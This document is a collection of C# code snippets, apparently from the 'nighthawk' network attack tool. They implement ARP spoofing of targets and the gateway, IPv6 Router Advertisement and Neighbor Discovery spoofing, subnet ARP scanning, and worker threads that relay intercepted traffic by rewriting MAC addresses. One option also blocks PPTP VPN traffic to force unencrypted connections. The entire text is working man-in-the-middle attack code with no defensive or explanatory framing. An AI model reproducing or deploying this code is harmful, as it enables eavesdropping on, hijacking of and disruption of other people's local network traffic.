// worker function for sending RA packets public void WorkerSender() { while (SpoofingStarted) { // we need to generate packets inside the loop, because IPv6toMACTargets can change (86 bytes for ND, 166 for RA ?) var sendQueue = new SendQueue(IPv6toMACTargets.Count * 86 + 166 + 512); sendQueue.Add(GenerateRouterAdvertisement(prefix).Bytes); foreach (var target in IPv6toMACTargets) { // send spoofed ND advertisements to the gateway if (target.Key != gatewayIPv6) { sendQueue.Add(GenerateNDAdvertisement(target.Key).Bytes); } } sendQueue.Transmit(device, SendQueueTransmitModes.Normal); sendQueue.Dispose(); Thread.Sleep(2500); } return; }
/// <summary> /// A variation to original "Transmit" method accepting "null" queues. /// </summary> public static void TransmitAll(this SendQueue sendQueue, WinPcapDevice device) { if (sendQueue == null) { return; } sendQueue.Transmit(device, SendQueueTransmitModes.Normal); sendQueue.Dispose(); }
// worker function for sending ARP requests private void WorkerSender() { // get start/end IP if (deviceInfo.Mask == "0.0.0.0") { deviceInfo.Mask = "255.255.255.0"; ShowInputDialog(ref deviceInfo.Mask); } long[] range = Network.MaskToStartEnd(deviceInfo.IP, deviceInfo.Mask); long startIP = range[0]; long tot_endIP = range[1]; long currentIP = startIP; int chunkSize = 16; while (currentIP <= tot_endIP) { var possibilities = Math.Min((int)tot_endIP - (int)currentIP, chunkSize); var endIP = currentIP + possibilities; var sendQueue = new SendQueue(possibilities * 80); // There are still losses in arp, try to send packet in chunks var deviceIP = IPAddress.Parse(deviceInfo.IP); // create ARP requests for all the hosts in our subnet); while (currentIP <= endIP) { sendQueue.Add(GenerateARPRequest(Network.LongToIP(currentIP), deviceIP).Bytes); currentIP++; } // send our queue //sendQueue.Transmit(device, SendQueueTransmitModes.Normal); // There are losses in ARP part, not sure why, try different timing for better accuracy sendQueue.Transmit(device, SendQueueTransmitModes.Synchronized); Thread.Sleep(1000); } Thread.Sleep(3000); // stop other threads and stop scanning Started = false; workerARP.Join(); workerNDP.Join(); ScanCompleted(); return; }
// worker function for sending ARP requests private void WorkerSender() { for (int i = 0; i < 3; i++) { // get start/end IP long[] range = Network.MaskToStartEnd(deviceInfo.IP, deviceInfo.Mask); long startIP = range[0]; long endIP = range[1]; long currentIP = startIP; var possibilities = (int)endIP - (int)startIP; var sendQueue = new SendQueue(possibilities * 80); var deviceIP = IPAddress.Parse(deviceInfo.IP); // create ARP requests for all the hosts in our subnet); while (currentIP <= endIP) { sendQueue.Add(GenerateARPRequest(Network.LongToIP(currentIP), deviceIP).Bytes); currentIP++; } // send our queue sendQueue.Transmit(device, SendQueueTransmitModes.Normal); Thread.Sleep(3000); } // stop other threads and stop scanning Started = false; workerARP.Join(); workerNDP.Join(); ScanCompleted(); return; }
// worker for sending ARP reply packets public void WorkerSender() { var sendQueue = new SendQueue((SpoofingTargets1.Count * 2 * 60) + 60); foreach (Target target1 in SpoofingTargets1) { // send fake replies to the gateway sendQueue.Add(GenerateARPReply(target1.IP, SpoofingTarget2.IP, SpoofingTarget2.PMAC).Bytes); // senda fake replies to targets sendQueue.Add(GenerateARPReply(SpoofingTarget2.IP, target1.IP, target1.PMAC).Bytes); } while (SpoofingStarted) { sendQueue.Transmit(device, SendQueueTransmitModes.Normal); Thread.Sleep(2500); } sendQueue.Dispose(); return; }
// worker function for routing IPv6 packets public void WorkerRouter() { while (SpoofingStarted) { // size of packets - needed for send queue (set some starting value - it seems the length is not set correctly during threadQueue packet copying) int bufferSize = 2048; // copy packets to threadRoutingQueue lock (PacketQueueRouting) { foreach (Packet packet in PacketQueueRouting) { threadQueueRouting.Add(packet); bufferSize += packet.Bytes.Length; } PacketQueueRouting.Clear(); } if (threadQueueRouting.Count > 0) { var sendQueue = new SendQueue(bufferSize); // loop through packets and change MAC addresses foreach (Packet packet in threadQueueRouting) { if (packet == null) { continue; } var ethernetPacket = (packet as EthernetPacket); if (ethernetPacket == null) { continue; } var ip = (packet is IpPacket ? (IpPacket)packet : IpPacket.GetEncapsulated(packet)); var sourceIP = ip.SourceAddress.ToString(); var destinationIP = ip.DestinationAddress.ToString(); var destinationMAC = ethernetPacket.DestinationHwAddress.ToString(); if (sourceIP == deviceInfo.IPv6 || destinationIP == deviceInfo.IPv6) { continue; } // skip local network traffic if ((sourceIP.Contains(prefix.Replace("::", ":")) && destinationIP.Contains(prefix.Replace("::", ":"))) || (sourceIP.Contains("fe80::") || destinationIP.Contains("fe80::"))) { continue; } // check for IPv6 - MAC entry existance (check only addresses from this network) and add it if necessary (we need this because scanner cannot pick up IPv6 addresses of all the targets) if (sourceIP.Contains(prefix.Replace("::", ":")) && !IPv6toMACTargets.ContainsKey(sourceIP) && !sourceIP.Contains("fe80::")) { lock (IPv6toMACTargets) { IPv6toMACTargets.Add(sourceIP, ethernetPacket.SourceHwAddress); } } // incoming packets (internet -> nighthawk) - change destination MAC back to target's MAC if (IPv6toMACTargets.ContainsKey(destinationIP) && (destinationMAC != IPv6toMACTargets[destinationIP].ToString())) { ethernetPacket.SourceHwAddress = physicalAddress; ethernetPacket.DestinationHwAddress = IPv6toMACTargets[destinationIP]; if (ethernetPacket.Bytes != null) { sendQueue.Add(packet.Bytes); } } // outgoing packets (targets -> nighthawk) - change destination MAC to gateway's MAC if (IPv6toMACTargets.ContainsKey(sourceIP) && (destinationMAC != IPv6toMACTargets[gatewayIPv6].ToString())) { ethernetPacket.SourceHwAddress = physicalAddress; ethernetPacket.DestinationHwAddress = IPv6toMACTargets[gatewayIPv6]; if (ethernetPacket.Bytes != null) { sendQueue.Add(packet.Bytes); } } } sendQueue.Transmit(device, SendQueueTransmitModes.Normal); sendQueue.Dispose(); threadQueueRouting.Clear(); } else { Thread.Sleep(1); } } return; }
// worker for routing IPv4 packets public void WorkerRouter() { while (SpoofingStarted) { // size of packets - needed for send queue (set some starting value - it seems the length is not set correctly during threadQueue packet copying) int bufferSize = 2048; // copy packets to thread's packet storage (threadRoutingQueue) lock (PacketQueueRouting) { foreach (Packet packet in PacketQueueRouting) { threadQueueRouting.Add(packet); bufferSize += packet.Bytes.Length; } PacketQueueRouting.Clear(); } if (threadQueueRouting.Count > 0) { var sendQueue = new SendQueue(bufferSize); // loop through packets and change MAC addresses foreach (Packet packet in threadQueueRouting) { if (packet == null) { continue; } var ethernetPacket = (packet as EthernetPacket); if (ethernetPacket == null) { continue; } var ip = (packet is IpPacket ? (IpPacket)packet : IpPacket.GetEncapsulated(packet)); // discard invalid packets if (ip is IPv4Packet && (((IPv4Packet)ip).Checksum == 0 || !((IPv4Packet)ip).ValidIPChecksum)) { continue; } var sourceIP = ip.SourceAddress.ToString(); var destinationIP = ip.DestinationAddress.ToString(); var sourceMAC = ethernetPacket.SourceHwAddress.ToString(); var destinationMAC = ethernetPacket.DestinationHwAddress.ToString(); if (destinationMAC == sourceMAC) { continue; } // block PPTP if necessary (exclude local computer) if (blockPPTP && sourceIP != deviceInfo.IP && destinationIP != deviceInfo.IP) { // block GRE if (ip.Protocol == IPProtocolType.GRE) { continue; } // check for port 1723 and block it if (ip.Protocol == IPProtocolType.TCP) { var tcp = TcpPacket.GetEncapsulated(packet); if (tcp != null && (tcp.SourcePort == 1723 || tcp.DestinationPort == 1723)) { continue; } } } // incoming packets - change destination MAC back to target's MAC if (IPtoMACTargets1.ContainsKey(destinationIP) && (destinationMAC != IPtoMACTargets1[destinationIP].ToString())) { ethernetPacket.SourceHwAddress = physicalAddress; ethernetPacket.DestinationHwAddress = IPtoMACTargets1[destinationIP]; if (ethernetPacket.Bytes != null) { sendQueue.Add(packet.Bytes); } } // outgoing packets - change destination MAC to gateway's MAC if (IPtoMACTargets1.ContainsKey(sourceIP) && (destinationMAC != SpoofingTarget2.PMAC.ToString())) { ethernetPacket.SourceHwAddress = physicalAddress; ethernetPacket.DestinationHwAddress = SpoofingTarget2.PMAC; if (ethernetPacket.Bytes != null) { sendQueue.Add(packet.Bytes); } } } sendQueue.Transmit(device, SendQueueTransmitModes.Normal); sendQueue.Dispose(); threadQueueRouting.Clear(); } else { Thread.Sleep(1); } } return; }